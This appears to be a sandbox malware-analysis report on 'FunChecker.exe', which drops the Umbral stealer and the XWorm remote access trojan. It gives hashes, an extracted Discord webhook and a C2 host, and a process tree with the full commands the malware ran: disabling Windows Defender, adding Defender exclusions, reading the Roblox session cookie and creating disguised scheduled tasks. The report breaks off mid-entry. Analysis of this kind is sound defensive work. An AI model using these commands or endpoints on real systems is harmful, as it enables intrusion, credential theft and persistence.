Analysis

  • max time kernel
    82s
  • max time network
    89s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    20-07-2024 15:16

General

  • Target

    FunChecker.exe

  • Size

    13.6MB

  • MD5

    8b2fa6497ba4fc285a5545bda2e8cde6

  • SHA1

    31cec6fb97888c34c80af8ca73aa67456f68e4e3

  • SHA256

    5197fcb7b98a65eabf8151d847bb394eccd65a184f06a82f674a9b95e62e701c

  • SHA512

    fbf93ca3aecabdbb4a8c978037ca15f14b990fdd32c892e0fdd8bbb491bde8005fbf8326dbd89adf71e9c7cca7f1592dc7ef5694cc45181a50332ed6a594ee40

  • SSDEEP

    393216:jrmibLqxo6IKWmKF8tmZ4O/Qtu1dmoz2jqK8VPYAjV2:jr7b+xHI76tmZ4O4E1d99QAjQ

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1263969302936031242/olHrwbuoNh8UxVs0Eh00oYjpj3hs8m4JFfGFTZq-qdru9A_R06a4zPTH8NVHDmX7Crj_

Extracted

Family

xworm

Version

3.0

C2

plus-loves.gl.at.ply.gg:59327

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Detect Umbral payload 3 IoCs
  • Detect Xworm Payload 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 15 IoCs
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 21 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FunChecker.exe
    "C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4228
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3684
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:1676
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        3⤵
          PID:600
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          3⤵
            PID:2172
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            3⤵
              PID:3348
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:4868
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:424
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:2972
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:508
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:2216
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
              3⤵
                PID:1912
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                3⤵
                  PID:1936
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                  3⤵
                    PID:4404
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                    3⤵
                      PID:524
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                      3⤵
                        PID:2760
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                        3⤵
                          PID:2108
                        • C:\Windows\system32\schtasks.exe
                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                          3⤵
                            PID:4116
                          • C:\Windows\system32\schtasks.exe
                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                            3⤵
                              PID:4668
                            • C:\Windows\system32\schtasks.exe
                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                              3⤵
                                PID:3080
                              • C:\Windows\system32\schtasks.exe
                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                3⤵
                                  PID:2440
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                  3⤵
                                    PID:4080
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                    3⤵
                                      PID:488
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                      3⤵
                                        PID:3408
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:404
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:2096
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:2420
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                        3⤵
                                          PID:4672
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                          3⤵
                                            PID:4980
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                            3⤵
                                              PID:2104
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                              3⤵
                                                PID:1676
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                3⤵
                                                • Modifies security service
                                                PID:2236
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
                                              2⤵
                                                PID:2348
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat" "
                                                2⤵
                                                  PID:2332
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "
                                                  2⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:428
                                                  • C:\Windows\system32\chcp.com
                                                    chcp 65001
                                                    3⤵
                                                      PID:2968
                                                  • C:\Users\Admin\AppData\Local\Temp\system32.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\system32.exe"
                                                    2⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Drops file in Drivers directory
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Checks whether UAC is enabled
                                                    • Writes to the Master Boot Record (MBR)
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2660
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3048
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                      3⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1676
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      3⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4404
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      3⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4356
                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                      "wmic.exe" os get Caption
                                                      3⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4332
                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                      "wmic.exe" computersystem get totalphysicalmemory
                                                      3⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4528
                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                      "wmic.exe" csproduct get uuid
                                                      3⤵
                                                        PID:4176
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                        3⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4116
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        "wmic" path win32_VideoController get name
                                                        3⤵
                                                        • Detects videocard installed
                                                        PID:4972
                                                    • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"
                                                      2⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Drops startup file
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Adds Run key to start application
                                                      • Checks whether UAC is enabled
                                                      • Writes to the Master Boot Record (MBR)
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:2992
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3564
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1120
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4852
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:832
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe"
                                                        3⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:664
                                                    • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                      2⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Drops startup file
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Adds Run key to start application
                                                      • Checks whether UAC is enabled
                                                      • Writes to the Master Boot Record (MBR)
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4016
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4444
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:64
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunCheker.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3712
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunCheker.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4392
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunCheker" /tr "C:\Users\Admin\AppData\Roaming\FunCheker.exe"
                                                        3⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:3684
                                                      • C:\Users\Admin\AppData\Local\Temp\HPN42SDD8UHTLWI.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\HPN42SDD8UHTLWI.exe"
                                                        3⤵
                                                        • Drops startup file
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:4424
                                                        • C:\Windows\System32\schtasks.exe
                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "HPN42SDD8UHTLWI" /tr "C:\Users\Admin\AppData\Roaming\HPN42SDD8UHTLWI.exe"
                                                          4⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:2000
                                                      • C:\Users\Admin\AppData\Local\Temp\33WHFCVS57NXGIT.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\33WHFCVS57NXGIT.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Modifies registry class
                                                        PID:4912
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"
                                                          4⤵
                                                            PID:3876
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "
                                                              5⤵
                                                                PID:3684
                                                                • C:\HypercomponentCommon\hyperSurrogateagentCrt.exe
                                                                  "C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"
                                                                  6⤵
                                                                  • Modifies WinLogon for persistence
                                                                  • Executes dropped EXE
                                                                  • Adds Run key to start application
                                                                  • Drops file in Windows directory
                                                                  • Modifies registry class
                                                                  PID:664
                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kleghtlu\kleghtlu.cmdline"
                                                                    7⤵
                                                                      PID:4680
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES71D0.tmp" "c:\Users\Admin\AppData\Roaming\CSCF6D6BC8FAF0144D5922F1843B23DA98E.TMP"
                                                                        8⤵
                                                                          PID:4520
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ilftiht0\ilftiht0.cmdline"
                                                                        7⤵
                                                                        • Drops file in System32 directory
                                                                        PID:4484
                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES721E.tmp" "c:\Windows\System32\CSC9F2BFC5A824449828879E6BA61F831F8.TMP"
                                                                          8⤵
                                                                            PID:4956
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'
                                                                          7⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:4088
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\WmiPrvSE.exe'
                                                                          7⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:4396
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
                                                                          7⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:4980
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\InstallAgent.exe'
                                                                          7⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:2328
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\lsass.exe'
                                                                          7⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:4140
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'
                                                                          7⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          PID:2572
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\31rB2fmfHH.bat"
                                                                          7⤵
                                                                            PID:3180
                                                                            • C:\Windows\system32\chcp.com
                                                                              chcp 65001
                                                                              8⤵
                                                                                PID:3408
                                                                              • C:\Windows\system32\PING.EXE
                                                                                ping -n 10 localhost
                                                                                8⤵
                                                                                • Runs ping.exe
                                                                                PID:1940
                                                                              • C:\Recovery\WindowsRE\dwm.exe
                                                                                "C:\Recovery\WindowsRE\dwm.exe"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:2044
                                                                • C:\Windows\system32\taskmgr.exe
                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                  1⤵
                                                                  • Drops file in Windows directory
                                                                  • Checks SCSI registry key(s)
                                                                  • Checks processor information in registry
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:4964
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:1040
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3804
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:2904
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:4628
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:2764
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:4204
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:488
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:3356
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:4356
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "InstallAgentI" /sc MINUTE /mo 13 /tr "'C:\HypercomponentCommon\InstallAgent.exe'" /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:312
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks.exe /create /tn "InstallAgent" /sc ONLOGON /tr "'C:\HypercomponentCommon\InstallAgent.exe'" /rl HIGHEST /f
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:1504
                                                                • C:\Windows\system32\schtasks.exe
